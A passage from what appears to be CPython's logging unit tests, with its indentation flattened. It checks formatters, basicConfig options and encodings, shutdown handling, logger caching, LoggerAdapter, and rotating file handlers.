return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
self.assertRaises(ValueError, logging.disable, "doesnotexists")
class _NotAnIntOrString:
pass
self.assertRaises(TypeError, logging.disable, _NotAnIntOrString())
logging.disable("WARN")
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='%(asctime)s - %(message)s')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, '%(asctime)s - %(message)s')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
def test_encoding(self):
try:
encoding = 'utf-8'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='strict',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data,
'The Øresund Bridge joins Copenhagen to Malmö')
def test_encoding_errors(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='ignore',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, 'The resund Bridge joins Copenhagen to Malm')
def test_encoding_errors_default(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertEqual(handler.errors, 'backslashreplace')
logging.debug('😂: ☃️: The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, r'\U0001f602: \u2603\ufe0f: The \xd8resund '
r'Bridge joins Copenhagen to Malm\xf6')
def test_encoding_errors_none(self):
# Specifying None should behave as 'strict'
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors=None,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertIsNone(handler.errors)
message = []
def dummy_handle_error(record):
_, v, _ = sys.exc_info()
message.append(str(v))
handler.handleError = dummy_handle_error
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
self.assertTrue(message)
self.assertIn("'ascii' codec can't encode "
"character '\\xd8' in position 4:", message[0])
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
# didn't write anything due to the encoding error
self.assertEqual(data, r'')
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
def innermost():
self.logger.warning('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('root'))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
# bpo-45401 - test with special file
# We set maxBytes to 1 so that rollover would normally happen, except
# for the check for regular files
rh = logging.handlers.RotatingFileHandler(
os.devnull, encoding="utf-8", maxBytes=1)
self.assertFalse(rh.shouldRollover(self.next_rec()))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
def test_namer_rotator_inheritance(self):
class HandlerWithNamerAndRotator(logging.handlers.RotatingFileHandler):
def namer(self, name):
return name + ".test"
def rotator(self, source, dest):
if os.path.exists(source):
os.replace(source, dest + ".rotated")
rh = HandlerWithNamerAndRotator(
self.fn, backupCount=2, maxBytes=1)
self.assertEqual(rh.namer(self.fn), self.fn + ".test")
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(rh.namer(self.fn + ".1") + ".rotated")
self.assertFalse(os.path.exists(rh.namer(self.fn + ".1")))
rh.close()
@support.requires_zlib()
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
